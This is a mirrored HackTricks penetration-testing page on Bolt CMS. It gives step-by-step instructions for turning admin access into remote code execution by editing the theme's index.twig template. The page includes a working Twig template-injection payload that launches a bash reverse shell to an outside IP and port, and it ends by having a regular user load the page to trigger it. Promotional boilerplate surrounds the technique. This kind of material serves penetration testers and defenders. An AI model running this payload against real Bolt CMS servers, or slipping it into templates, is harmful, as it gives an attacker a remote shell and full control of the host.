mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
4.2 KiB
4.2 KiB
Bolt CMS
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
RCE
After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:
- Select
Configuration
->View Configuration
->Main Configuration
or go the the URL path/bolt/file-edit/config?file=/bolt/config.yaml
- Check the value of theme
- Select
File management
->View & edit templates
- Select the theme base found in the previous (
base-2021
in this case) step and selectindex.twig
- In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
- Select the theme base found in the previous (
- Set your payload in this file via template injection (Twig), like:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
- And save changes
- Clear the cache in
Maintenance
->Clear the cache
- Access again the page as a regular user, and the payload should be executed
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.